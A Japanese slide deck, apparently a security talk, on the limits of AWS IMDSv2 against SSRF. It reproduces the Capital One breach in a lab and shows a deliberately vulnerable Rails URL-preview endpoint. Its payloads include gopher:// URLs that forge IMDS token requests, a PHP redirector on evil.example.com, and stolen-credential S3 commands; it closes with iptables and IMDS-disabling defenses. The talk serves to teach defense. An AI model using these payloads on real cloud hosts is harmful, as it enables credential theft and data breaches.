Movatterモバイル変換

SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方EGセキュアソリューションズ株式会社代表取締役徳丸浩

徳丸浩の自己紹介• 経歴– 1985年京セラ株式会社入社– 1995年京セラコミュニケーションシステム株式会社(KCCS)に出向・転籍– 2008年 KCCS退職、HASHコンサルティング株式会社(現社名:EGセキュアソリューションズ株式会社)設立• 経験したこと– 京セラ入社当時はCAD、計算幾何学、数値シミュレーションなどを担当– その後、企業向けパッケージソフトの企画・開発・事業化を担当– 1999年から、携帯電話向けインフラ、プラットフォームの企画・開発を担当Webアプリケーションのセキュリティ問題に直面、研究、社内展開、寄稿などを開始– 2004年にKCCS社内ベンチャーとしてWebアプリケーションセキュリティ事業を立ち上げ• 現在– EGセキュアソリューションズ株式会社代表 https://www.eg-secure.co.jp/– 株式会社グレスアベイル社外取締役 https://www.gresavail.com/– 独立行政法人情報処理推進機構非常勤研究員 https://www.ipa.go.jp/security/– 著書「体系的に学ぶ安全なWebアプリケーションの作り方第2版」(2018年6月21日)「徳丸浩のWebセキュリティ教室」(2015年10月)– 技術士（情報工学部門）3© 2020 Hiroshi Tokumaru

EC2 IMDS(IMDSv1)とは• Instance MetaData Service• Amazon EC2 の仮想エンドポイントhttp://169.254.169.254/• アクセス元の設定情報（Instance MetaData）を返す• 外部からはIMDSにはアクセスできないので設定情報はもれない…はず• PUBLIC IPv4を取得する例$ curl http://169.254.169.254/latest/meta-data/public-ipv418.217.170.163$© 2020 Hiroshi Tokumaru 4EC2インスタンス IMDSEC2169.254.169.254仮想的なエンドポイントインスタンスの設定情報

SSRF攻撃によるCapital Oneの個人情報流出についてまとめてみた - piyolog2019年7月29日、米金融大手 Capital Oneは不正アクセスにより1億人を超える個人情報が流出したと発表しました。WAFの設定ミスに起因して、Server Side Request Forgery（SSRF）攻撃を許したことにより情報を盗まれたと見られています。ここでは関連する情報をまとめます。Capital Oneによる公式発表• Information on the Capital One Cyber Incident（米国向け）• Information on the Capital One Cyber Incident（カナダ向け）• Frequently Asked Questions（１）影響範囲影響が及んだ人数の内訳は以下の通り。発表時点でCapital Oneは流出した情報が外部へ出回ることや、詐欺への使用は確認していない。クレジットカード番号、ログイン情報は侵害されていない。6米国約1億人カナダ約600万人https://piyolog.hatenadiary.jp/entry/2019/08/06/062154 より引用

攻撃の模様7Apache+mod_securityリバースプロキシとして構成AWSEC2AmazonS3169.254.169.254（IMDSのエンドポイント）SSRF攻撃によりISRM-WAF-RoleにアクセスISRM-WAF-RoleS3個人情報などを保管 WAFの設定ミスを悪用したSSRF攻撃 HostヘッダにIMDSエントリを指定 設定ミスの詳細は明らかにされていない。 1億人を超える被害者が出た。© 2020 Hiroshi Tokumaru

Apacheでリバースプロキシとmod_securityを導入# 以下はAmazon Linux上のでの操作# Apacheとmod_security、CRS（ルール）をインストール$ sudo yum install httpd mod_security mod_security_crs$ vi /etc/httpd/conf.d/reverseproxy.conf$ sudo systemctl restart httpd© 2020 Hiroshi Tokumaru 10ProxyRequests On<VirtualHost *:80>ServerName hadena.tokumaru.orgProxyPass /error ! # エラーページ用ProxyPass / http://172.31.XXX.XXX:3000/ProxyErrorOverride OnProxyPassReverse / http://172.31.XXX.XXX:3000/</VirtualHost>Ruby on Railsによるアプリケーションサーバー（後述）

13https://httpd.apache.org/docs/2.4/ja/mod/mod_proxy.html より引用警告サーバを安全にするまで ProxyRequests は有効にしないでください。オープンプロキシサーバはあなた自身のネットワークにとっても、インターネット全体にとっても危険です。

オープン・プロキシとして利用できた便利!15

mod_securityがブロックしていたApache-Error: [file "apache2_util.c"] [line 273] [level 3] [client 221.246.230.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "98"] [id "960017"] [rev "2"] [msg "Host header is a numeric IP address"] [data "169.254.169.254"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [hostname "169.254.169.254"] [uri "http:/169.254.169.254/"] [unique_id "XkKBvsG@i7@6ZJTFMv@7yAAAAAA"]© 2020 Hiroshi Tokumaru 18HostヘッダがIPアドレス

AWS-CLIを素の環境にインストールしてクレデンシャルをセット$ # AWS-CLI をインストール$ mkdir ~/.aws; cd ~/.aws$ vi ~/.aws/credential$ cat ~/.aws/credential[ssrf]aws_access_key_id = ASIAXXXXXXXXXXXXXXXDaws_secret_access_key = N1XZ6XXXXXXXXXXXXXXXXXXXXXXXXaws_session_token = "IQoJb3JpZ2luX2VjEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX…XXXXXXXXXXXX="© 2020 Hiroshi Tokumaru 21

S3バケットにアクセス(1)$ aws s3 --profile ssrf ls2020-02-09 20:38:18 hadena-bookmark$ aws s3 --profile ssrf ls s3://hadena-bookmark/2020-02-11 15:27:08 3961 2020-01-31-001.log…2020-02-11 15:30:33 2490 2020-02-09-001.log$ aws s3 --profile ssrf cp s3://hadena-bookmark/2020-02-09-001.log .download: s3://hadena-bookmark/2020-02-09-001.log to ./2020-02-09-001.log$© 2020 Hiroshi Tokumaru 22

S3バケットに保存されたログを表示$ cat 2020-02-09-001.log2020/2/9 00:11:39,4689,175.93.231.93,KANAKO HARADA,431293,3590483413538693,11202020/2/9 01:57:34,3834,210.13.159.11,HIOSHI TOKUMARU,53150,1234567890123450,03182020/2/9 02:13:20,3778,183.11.41.34,TARO YAMADA,160699,2345678901234501,07202020/2/9 02:23:53,7261,19.135.31.93,KOICHI TAKEDA,188199,3456789012345012,12172020/2/9 03:21:35,3778,208.59.213.93,JIRO UCHIDA,311207,4567890123450123,01202020/2/9 03:43:19,3927,105.34.205.91,SABURO TANAKA,329293,5678901234501234,10182020/2/9 04:43:17,3927,135.91.203.25,HANAKO TAKAHASHI,499707,6789012345012345,0918……2020/2/9 20:13:20,3778,183.11.41.34,TARO YAMADA,160699,2345678901234501,07212020/2/9 21:23:53,7261,19.135.31.93,KOICHI TAKEDA,188199,3456789012345012,12192020/2/9 22:21:35,3778,208.59.213.93,JIRO UCHIDA,311207,4567890123450123,01222020/2/9 23:11:39,4689,175.93.231.93,KANAKO HARADA,431293,3590483413538693,11202020/2/9 23:43:19,3927,105.34.205.91,SABURO TANAKA,329293,5678901234501234,1021$© 2020 Hiroshi Tokumaru 23

攻撃の模様（再掲）24Apache+mod_securityリバースプロキシとして構成AWSEC2AmazonS3169.254.169.254（IMDSのエンドポイント）SSRF攻撃によりISRM-WAF-RoleにアクセスISRM-WAF-RoleS3個人情報などを保管 WAFの設定ミスを悪用したSSRF攻撃 HostヘッダにIMDSエントリを指定 設定ミスの詳細は明らかにされていない。 1億人を超える被害者が出た。© 2020 Hiroshi Tokumaru

IMDSv2とは?• v2へのアクセスには事前に取得したTokenを必須とする– TokenはPUTで取得する必要がある– Tokenリクエスト時に有効期限(秒)を設定できる– Tokenはヘッダに入れてリクエストする必要がある• v1を無効化できる(デフォルトでは併用可能)• メタデータサービス自体を無効化できる• EC2インスタンスを立ち上げる際にv2のみに設定することをIAMで強制することができる• X-Forwarded-ForヘッダーがあるリクエストにTokenを発行しない• メタデータレスポンスのTTLを短くし複数ホストを経由した取得を防止できる26クラスメソッド臼田氏のブログ記事より引用 https://dev.classmethod.jp/cloud/aws/ec2-imdsv2-release/

IMDSv2のみを有効化（IMDSv1を無効化）する$ aws ec2 modify-instance-metadata-options --instance-id i-0dxxxxxxxxxxxxxxxx --http-tokens required --http-endpointenabled{"InstanceId": "i-0xxxxxxxxxxxxxx","InstanceMetadataOptions": {"State": "pending","HttpTokens": "required","HttpPutResponseHopLimit": 1,"HttpEndpoint": "enabled"}}© 2020 Hiroshi Tokumaru 27

トークンを用いてメタデータを取得する$ curl -H "X-aws-ec2-metadata-token: AQAAAA-…lpg==" http://169.254.169.254/latest/meta-data/iam/security-credentials/hadena{"Code" : "Success","LastUpdated" : "2020-02-12T03:49:08Z","Type" : "AWS-HMAC","AccessKeyId" : "ASIAXXXXXXXXXXXXXT","SecretAccessKey" : "/+LcPtXXXXXXXXXXXXXXXXXXXXXXXXXX","Token" : "IQoJb3JpZ2luXXXXXXXXXXXXXXXX … XXXXXXXXXXXXXXXXXX==","Expiration" : "2020-02-12T09:55:59Z"}© 2020 Hiroshi Tokumaru 29

X-Forwarded-Forヘッダをつけるとエラーになる$ curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 3600" -H "X-Forwarded-For: 203.0.113.1"<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>403 - Forbidden</title></head><body><h1>403 - Forbidden</h1></body></html>© 2020 Hiroshi Tokumaru 30

IMDSv2の効果まとめ• PUTメソッドを用いてトークン取得• X-aws-ec2-metadata-token-ttl-secondsヘッダが必要• X-Forwarded-Forヘッダがあるとエラーになる• 「Capital One仕様の脆弱なWAF」の場合– PUT メソッド … mod_securityでエラーに– X-aws-ec2-metadata-token-ttl-secondsヘッダ付与可能– X-Forwarded-Forヘッダ自動的に付与 → エラーに• 【結論】IMDSv2 はオープンリバースプロキシからのSSRF攻撃対策として一定の効果がある© 2020 Hiroshi Tokumaru 31

プレビュー機能でのSSRF攻撃© 2020 Hiroshi Tokumaru 33はてなブックマークのようなソーシャルブックマークの機能のうち、URLを指定してプレビューを表示するというもの(Ruby on Rails)。題して「派手なブックマーク」class BookmarkController < ApplicationControllerdef indexc = Curl::Easy.new(params[:url])c.follow_location = truec.http_gets = c.body_strs.force_encoding("UTF-8");render html: Sanitize.clean(s, Sanitize::Config::RELAXED).html_safeendend※ 本サンプルはスキームやURLのチェックを一切行っていないため、SSRF脆弱有害なタグを取り除く処理

mod_securityがブロックしていたMessage: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?://(d{1,3}.d{1,3}.d{1,3}.d{1,3})" at ARGS:url. [file "/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"]© 2020 Hiroshi Tokumaru 36URLがRFI (Remote File Inclusion)のルールに抵触

IMDSv2での攻撃に関する検討• PUTメソッドを用いてトークン取得• X-aws-ec2-metadata-token-ttl-secondsヘッダが必要• X-Forwarded-Forヘッダがあるとエラーになる• 「派手なブックマーク」の場合– PUT メソッド … PUTメソッドの指定は困難そう– X-aws-ec2-metadata-token-ttl-secondsヘッダ付与できなさそう– X-Forwarded-Forヘッダ付与されない → これはOK• IMDSv2 の突破は困難なように見える• それ、Gopherでできるよ!© 2020 Hiroshi Tokumaru 39

GopherプロトコルとはGopher（ゴーファー）とは、インターネットがテキストベース(文字情報主体)のネットワークであった1991年に、アメリカ合衆国のミネソタ大学が開発したテキストベースの情報検索システム。1993年頃から本格的になったWWWの普及や、Gopherそのものが日本語などマルチバイト文字環境に対応していなかったため、2013年1月現在はほとんど使われていない。https://ja.wikipedia.org/wiki/Gopher より引用40

Gopherの例• 以下で待受しておく$ nc -l 8888• 別ターミナルで以下を実行$ curl gopher://localhost:8888/_Hello%0d%0aHiroshi%20Tokumaru%0d%0a• 以下が表示される$ nc -l 8888HelloHiroshi TokumaruResponse ← この行はResponse 改行 Ctrl-d を手入力したもの• curl呼び出し後以下が表示される$ curl gopher://localhost:8888/_Hello%0d%0aHiroshi%20Tokumaru%0d%0aResponse$© 2020 Hiroshi Tokumaru 41

GopherでHTTPをエミュレートできる• 以下を実行すると…$ curl gopher://169.254.169.254:80/_PUT%20/latest/api/token%20HTTP/1.1%0D%0AHost:%20169.254.169.254%0D%0AX-aws-ec2-metadata-token-ttl-seconds:%203600%0D%0A%0D%0A• 以下が169.254.169.254に送信されるPUT /latest/api/token HTTP/1.1 [改行]Host: 169.254.169.254 [改行]X-aws-ec2-metadata-token-ttl-seconds: 3600 [改行][改行]• GopherプロトコルでPUTメソッドとカスタムヘッダを実現できる© 2020 Hiroshi Tokumaru 42

攻撃してみよう!© 2020 Hiroshi Tokumaru 43http://hadena.tokumaru.org/?url=gopher://169.254.169.254:80/_PUT%2520/latest/api/token%2520HTTP/1.1%250D%250AHost:%2520169.254.169.254%250D…これはトークンだが、インスタンスメタデータも同様に取得可能

URLのスキームをバリデーションすれば?© 2020 Hiroshi Tokumaru 44def indexurl = params[:url]uri = URI.parse(url)if uri.scheme != 'http' && uri.scheme != 'https'render html:'Invalid scheme'+ uri.schemereturnendc = Curl::Easy.new(url)# 以下略※ スキームをHTTPおよびHTTPSのみ許可する

リダイレクタによる攻撃• 外部のサイトにリダイレクタを設置する<?phpheader('Location: gopher://169.254.169.254:80/_PUT%20/latest/api/token%20HTTP/1.1%0D%0AHost:%20169.254.169…© 2020 Hiroshi Tokumaru 45evil.example.comIMDS(169.254.169.254)WebサーバーWAF?url=http://evil.example.com

対策• ネットワーク的な保護URLの完全な検証は難しいので、ネットワーク的な保護も有効です。以下は、AWSのドキュメントで推奨されている iptables の設定例。これにより、「docker0 ブリッジのコンテナがコンテナインスタンスのロールに指定されている権限にアクセスするのを防止できます」としている。iptablesによる設定は環境依存なのでご注意を。sudo iptables --insert FORWARD 1 --in-interface docker+ --destination 169.254.169.254/32 --jump DROPAmazon ECS コンテナインスタンスの IAM ロール - Amazon Elastic ContainerService より引用47© 2020 Hiroshi Tokumaru

IMDS自体が必要ない場合は無効化する48© 2020 Hiroshi Tokumaru$ aws ec2 modify-instance-metadata-options --instance-id i-0d095e1ae9ffac3c3 --http-endpoint disabled{"InstanceId": "i-0d095e1ae9ffac3c3","InstanceMetadataOptions": {"State": "pending","HttpTokens": "required","HttpPutResponseHopLimit": 1,"HttpEndpoint": "disabled"}}

IMDSを無効化すると、IMDS要求時に403が返る$ curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 3600"<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>403 - Forbidden</title></head><body><h1>403 - Forbidden</h1></body></html>© 2020 Hiroshi Tokumaru 49

Movatterモバイル変換

Change Language

SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方

In this document

Embed presentation

Recommended

More Related Content

What's hot

More from Hiroshi Tokumaru

Recently uploaded

SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方